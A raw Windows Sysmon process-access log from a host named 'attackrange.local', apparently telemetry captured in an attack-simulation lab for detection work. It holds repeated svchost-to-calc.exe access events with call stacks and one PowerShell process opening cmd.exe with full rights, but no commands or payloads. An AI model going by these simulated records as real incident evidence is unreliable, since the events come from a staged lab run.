22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361455Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361454Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361453Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361452Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361451Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361450Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361449Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361448Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361447Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361446Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361445Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-3708-6013-b403-000000001100}4072C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c01f5|UNKNOWN(00007FFC8F2B5DD3) 10341000x8000000000000000361444Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361443Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361442Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361441Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361440Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361439Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361438Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361437Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361436Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361435Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361434Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 